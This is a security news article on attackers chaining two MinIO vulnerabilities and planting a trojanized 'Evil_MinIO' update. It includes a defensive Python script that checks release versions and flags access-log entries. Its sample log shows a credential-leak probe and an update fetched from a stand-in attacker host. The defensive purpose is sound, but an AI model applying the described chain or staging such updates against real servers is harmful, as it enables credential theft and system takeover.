Emerging Cloud Attack Vector: A Case Study on MinIO Exploitation
September 6, 2023
A new cloud attack vector has surfaced that lets attackers execute code remotely and take control of systems running the distributed object storage service MinIO. This open-source service exposes an Amazon S3-compatible API and is used by businesses to store unstructured data such as photos, videos, log files, backups, and container images.
Recently, Security Joes researchers observed threat actors chaining two high-severity MinIO vulnerabilities, CVE-2023-28432 and CVE-2023-28434, to penetrate a corporate network. CVE-2023-28432 is an information disclosure flaw: in distributed deployments, a MinIO node would return all of its environment variables, including the MINIO_ROOT_PASSWORD and MINIO_SECRET_KEY credentials, in response to an unauthenticated request to its cluster bootstrap endpoint. CVE-2023-28434 is a privilege escalation flaw in which a crafted request bypasses MinIO's metadata bucket-name check. Both were fixed in RELEASE.2023-03-20T20-16-18Z. According to the researchers, 'The specific exploit chain we stumbled into was not observed in the wild before, or at least documented, making this the first instance of evidence showcasing such non-native solutions are being adopted by attackers.' The researchers were surprised to find that the product was susceptible to a new set of vulnerabilities that were relatively easy to exploit.
In this attack, a DevOps engineer was tricked into updating MinIO to a new version that was in fact a backdoor. The update was a weaponized build of MinIO carrying a built-in command shell function, 'GetOutputDirectly()', together with remote code execution (RCE) exploits for the two disclosed vulnerabilities. This booby-trapped build, named 'Evil_MinIO', is available in a GitHub repository.
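The two practical questions a defender has after reading the two paragraphs above are whether a given MinIO build predates the fix, and whether the access logs show the chain: an outside host hitting the cluster bootstrap endpoint that leaked credentials, followed by an admin update pulled from a non-official source (which is how a trojanized build such as Evil_MinIO gets installed). The script below is an added example, not code from the article, from Security Joes or from the MinIO project. The facts it relies on are the fixed release tag RELEASE.2023-03-20T20-16-18Z and the endpoint path /minio/bootstrap/v1/verify; the admin update path and its updateURL query parameter are assumptions drawn from how `mc admin update TARGET [MIRROR_URL]` talks to the server, and the access-log format and sample lines are constructed for the example.

```python
"""Two checks for the MinIO exploit chain (CVE-2023-28432 / CVE-2023-28434).

Added example; not code from the article, Security Joes or MinIO.
Facts: both CVEs were fixed in RELEASE.2023-03-20T20-16-18Z, and CVE-2023-28432
leaked environment variables (including MINIO_ROOT_PASSWORD / MINIO_SECRET_KEY)
through the cluster bootstrap endpoint /minio/bootstrap/v1/verify.
Assumptions: the admin update path and the updateURL query parameter; the
access-log format and the sample lines are constructed.
"""
import re
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

FIXED_RELEASE = "RELEASE.2023-03-20T20-16-18Z"
BOOTSTRAP_VERIFY = "/minio/bootstrap/v1/verify"
ADMIN_UPDATE = "/minio/admin/v3/update"  # assumed path behind `mc admin update`

_RELEASE_RE = re.compile(r"RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z")
# Common/combined log format, as a reverse proxy in front of MinIO would write it.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def release_timestamp(version: str) -> datetime:
    """Parse a MinIO release tag (also accepts `minio --version` output)."""
    m = _RELEASE_RE.search(version)
    if not m:
        raise ValueError(f"not a MinIO release tag: {version!r}")
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S")


def is_vulnerable_release(version: str) -> bool:
    """True when the build predates the fix for CVE-2023-28432 / -28434."""
    return release_timestamp(version) < release_timestamp(FIXED_RELEASE)


def triage_access_log(lines, cluster_peers):
    """Flag requests matching the two stages of the chain.

    cluster_peers: IPs of the MinIO nodes themselves, which legitimately POST to
    the bootstrap verify endpoint; any other source hitting it is a probe.
    Returns (kind, source_ip, detail) tuples in log order.
    """
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # unexpected format: skip rather than guess
        ip, method, target = m["ip"], m["method"], m["target"]
        url = urlsplit(target)  # target is path-only, so path/query split cleanly
        if url.path == BOOTSTRAP_VERIFY and method == "POST":
            if ip not in cluster_peers:
                findings.append(("env-leak-probe", ip, url.path))
        elif url.path == ADMIN_UPDATE:
            # Where the new binary came from. With no updateURL the official
            # mirror is used; anything else is how a trojanized build arrives.
            source = parse_qs(url.query).get("updateURL", ["<default mirror>"])[0]
            findings.append(("admin-update", ip, source))
    return findings


# Constructed sample: a legitimate peer check, an external probe of the leaking
# endpoint, ordinary bucket listing with the stolen credentials, then an update
# pulled from the attacker's own host.
SAMPLE_LOG = [
    '10.0.0.12 - - [01/Sep/2023:10:02:11 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Sep/2023:10:05:42 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Sep/2023:10:07:03 +0000] "GET /backups/?list-type=2 HTTP/1.1" 200 1402',
    '198.51.100.7 - - [01/Sep/2023:10:09:15 +0000] "POST /minio/admin/v3/update?updateURL=http://198.51.100.7:8080/minio HTTP/1.1" 200 64',
]
CLUSTER_PEERS = {"10.0.0.11", "10.0.0.12"}

if __name__ == "__main__":
    for v in ("RELEASE.2023-03-13T19-46-17Z", FIXED_RELEASE):
        print(v, "vulnerable" if is_vulnerable_release(v) else "fixed")
    for finding in triage_access_log(SAMPLE_LOG, CLUSTER_PEERS):
        print(*finding)
```

On the sample input the second and fourth lines are flagged: the probe from 198.51.100.7 and an admin update sourced from that same host. The version check compares release timestamps rather than strings so that `minio --version` output can be fed in directly; the log triage deliberately skips lines it cannot parse instead of guessing, and the peer allow-list is the piece you must fill in from your own topology, since the bootstrap endpoint is hit legitimately by every node in the cluster.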
Although the attack was halted before it reached the RCE-and-takeover stage, the existence of this malicious variant should serve as a warning to users to stay vigilant against future attacks, particularly those targeting software developers. A successful attack could expose sensitive corporate data and intellectual property, grant access to internal applications, and let attackers move deeper into an organization's infrastructure.
In their investigation report, Security Joes stressed the importance of security throughout the software development lifecycle. 'Failing to explicitly recognize the paramount importance of security across the entirety of the software development lifecycle constitutes a critical oversight,' they stated. They warned that such negligence could expose an organization to substantial risks that, while not immediate, lurk in the shadows waiting for the right opportunity.